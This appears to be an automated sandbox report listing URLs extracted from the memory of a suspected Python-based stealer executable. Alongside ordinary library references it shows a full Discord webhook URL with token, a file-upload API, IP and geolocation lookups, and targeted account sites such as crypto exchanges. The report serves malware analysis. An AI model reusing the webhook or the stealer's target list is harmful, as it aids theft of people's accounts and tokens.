00000000.00000003.294419997.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294685663.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294784208.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.298979692.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294226913.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.297328877.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: 322pVOVprx.exe, 00000000.00000003.296322944.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
      Source: 322pVOVprx.exe, 00000000.00000003.296322944.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: 322pVOVprx.exe, 00000000.00000003.294996970.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294848493.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.299239908.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294514542.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294101171.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294323597.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.297965068.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.298846422.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.296755649.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.295133023.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.295592917.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.293967842.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294578143.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294419997.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294685663.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294784208.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.298979692.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294226913.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.297328877.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: 322pVOVprx.exe, 00000001.00000002.371492201.0000023E95D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
      Source: 322pVOVprx.exe, 00000001.00000002.373965386.0000023E96640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/questions/19622133/
      Source: 322pVOVprx.exe, 00000001.00000003.354100842.0000023E968C7000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339805348.0000023E9689F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353899418.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349070461.0000023E968BD000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357442719.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356264962.0000023E968C8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374260676.0000023E9687E000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.351259701.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374359283.0000023E968C8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.362660689.0000023E96877000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355344001.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345206905.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314121747.0000023E968A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
      Source: 322pVOVprx.exe, 00000001.00000002.374679366.0000023E96B90000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339187150.0000023E96B8B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95E30000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357206780.0000023E95E63000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343852049.0000023E95E3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B81000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.354683376.0000023E95E4F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314334737.0000023E95E41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
      Source: 322pVOVprx.exe, 00000001.00000003.355166441.0000023E96B6B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95E30000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343437448.0000023E96B6A000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.360590071.0000023E96B6B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
      Source: 322pVOVprx.exe, 00000001.00000002.371492201.0000023E95D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
      Source: 322pVOVprx.exe, 00000001.00000003.307927048.0000023E95F3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307927048.0000023E95EC8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307987697.0000023E95F42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
      Source: 322pVOVprx.exe, 00000001.00000003.339187150.0000023E96B8B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95E30000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343852049.0000023E95E3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B81000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.354683376.0000023E95E4F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314334737.0000023E95E41000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356697936.0000023E96B9C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.372576275.0000023E95E62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
      Source: 322pVOVprx.exe, 00000000.00000003.294996970.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294848493.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.299239908.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294514542.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294101171.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294323597.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.297965068.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.298846422.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.296755649.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.295133023.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.293967842.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.296322944.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294578143.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294419997.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294685663.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294784208.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.298979692.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.295592917.000001E5FC54F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.294226913.000001E5FC544000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000000.00000003.297328877.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: 322pVOVprx.exe, 00000001.00000003.356246607.0000023E96C07000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.374708837.0000023E96C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
      Source: 322pVOVprx.exe, 00000001.00000003.357641194.0000023E9620D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345942222.0000023E9620B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314334737.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340079077.0000023E961F5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.358346646.0000023E9620D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339344619.0000023E961F4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373318168.0000023E9620D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
      Source: 322pVOVprx.exe, 00000001.00000003.307927048.0000023E95F3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307987697.0000023E95F42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
      Source: 322pVOVprx.exe, 00000001.00000003.307927048.0000023E95F3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307927048.0000023E95EC8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.307987697.0000023E95F42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
      Source: 322pVOVprx.exe, 00000001.00000003.355166441.0000023E96B6B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95E30000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343437448.0000023E96B6A000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.360590071.0000023E96B6B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96872000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
      Source: 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95E30000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.372589403.0000023E95E6F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.357206780.0000023E95E6F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343852049.0000023E95E3F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.354683376.0000023E95E4F000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314334737.0000023E95E41000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355836425.0000023E95E6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
      Source: 322pVOVprx.exe, 00000001.00000003.359301387.0000023E96970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
      Source: 322pVOVprx.exe, 00000001.00000003.314334737.0000023E96066000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.356593337.0000023E961FA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.340079077.0000023E961F5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96806000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.351259701.0000023E96847000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339344619.0000023E961F4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345206905.0000023E9683B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355344001.0000023E9684D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353899418.0000023E96848000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373306892.0000023E961FA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.359522305.0000023E961FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yahoo.com/
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aliexpress.com)z&
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazon.com)z
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
      Source: 322pVOVprx.exe, 00000001.00000003.360977811.0000023E967D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org)
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://binance.com)z
      Source: 322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.jaraco.com/skeleton
      Source: 322pVOVprx.exe, 00000001.00000003.306010144.0000023E95988000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.305400944.0000023E959A1000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344180227.0000023E95991000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.305400944.0000023E95A02000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.305217227.0000023E95A02000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.346078822.0000023E959A2000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.304866318.0000023E959CC000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.304949958.0000023E959A1000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.370451569.0000023E959A4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.308879711.0000023E95997000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349138209.0000023E959A4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.304695883.0000023E959F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue42195.
      Source: 322pVOVprx.exe, 00000001.00000002.373501171.0000023E96340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue44497.
      Source: 322pVOVprx.exe, 00000001.00000003.360977811.0000023E967D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://canary.discord.com/api/webhooks/1074508453810274374/Nec6TaE5xRyXOeI0D3jHDg3tbo5RD1960f-6jMKl
      Source: 322pVOVprx.exe, 00000001.00000003.338938047.0000023E96B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1050492593114456124/1051490320921145384/786713106658492416.we
      Source: 322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codecov.io/gh/pypa/setuptools
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coinbase.com)z
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crunchyroll.com)z
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com)z
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/users/
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/users/
      Source: 322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/channels/803025117553754132/815945031150993468
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disney.com)z$
      Source: 322pVOVprx.exe, 00000001.00000003.348630191.0000023E95A07000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.308879711.0000023E959FC000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343024871.0000023E95A05000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.352979192.0000023E95A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
      Source: 322pVOVprx.exe, 00000001.00000003.344180227.0000023E95991000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.354941347.0000023E95992000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353530096.0000023E95992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/pprint.html
      Source: 322pVOVprx.exe, 00000001.00000003.344180227.0000023E95991000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.354941347.0000023E95992000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353530096.0000023E95992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/pprint.html#pprint.pprint
      Source: 322pVOVprx.exe, 00000001.00000003.360078794.0000023E95AF1000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344669679.0000023E957A4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.313148973.0000023E95EA5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.352292036.0000023E95FD4000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347985009.0000023E95FB2000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.339363015.0000023E95FAC000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.370175258.0000023E957DA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343852049.0000023E95EA5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347844833.0000023E957AD000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349323854.0000023E957B5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.352559577.0000023E95AF1000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373501171.0000023E96340000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345409708.0000023E95F25000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.343024871.0000023E95A05000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.372718665.0000023E95F2D000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373965386.0000023E96640000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349356307.0000023E957B9000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.353103508.0000023E957CA000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.347147894.0000023E95F2B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.350749759.0000023E95FC0000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344269479.0000023E95ECF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/re.html
      Source: 322pVOVprx.exe, 00000001.00000002.373501171.0000023E96340000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373965386.0000023E96640000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.309324212.0000023E95FF5000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.309324212.0000023E95FB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/re.html#re.sub
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ebay.com)z$
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://epicgames.com)z
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://expressvpn.com)r
      Source: 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonp/z
      Source: 322pVOVprx.exe, 00000001.00000002.373501171.0000023E96340000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.309407108.0000023E95F0B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.309539690.0000023E95F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
      Source: 322pVOVprx.exe, 00000001.00000003.348277479.0000023E967E2000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.314265799.0000023E96806000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.349409786.0000023E96822000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.355469303.0000023E96824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
      Source: 322pVOVprx.exe, 00000001.00000003.368842470.0000023E9578C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.302256501.0000023E93B18000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.304897234.0000023E95786000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.344669679.0000023E95765000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.370067685.0000023E9578C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.350317626.0000023E95789000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345603847.0000023E95775000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.348047116.0000023E95786000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.304565097.0000023E95782000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.302368093.0000023E93B0C000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.345673018.0000023E93ABC000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.369138741.0000023E93AC0000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.368548378.0000023E9578B000.00000004.00000020.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000003.362948790.0000023E93ABE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
      Source: 322pVOVprx.exe, 00000001.00000002.373364941.0000023E96220000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
      Source: 322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/black
      Source: 322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
      Source: 322pVOVprx.exe, 00000001.00000002.373965386.0000023E96640000.00000004.00001000.00020000.00000000.sdmp, 322pVOVprx.exe, 00000001.00000002.373364941.0000023E96220000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
      Source: 322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools
      Source: 322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/actions?query=workflow%3A%22tests%22
      Source: 322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/discussions
      Source: 322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues
      Source: 322pVOVprx.exe, 00000001.00000002.373655740.0000023E96440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
      Source: 322pVOVprx.exe, 00000001.00000002.370996657.0000023E95C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
      Source: 322pVOVprx.exe, 00000000.00000003.299923334.000001E5FC544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/workflows/tests/badge.svg
      Source: 322pVOVprx.exe, 00000001.00000003.355028166.0000023E95F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyparsing/pyparsing/wiki
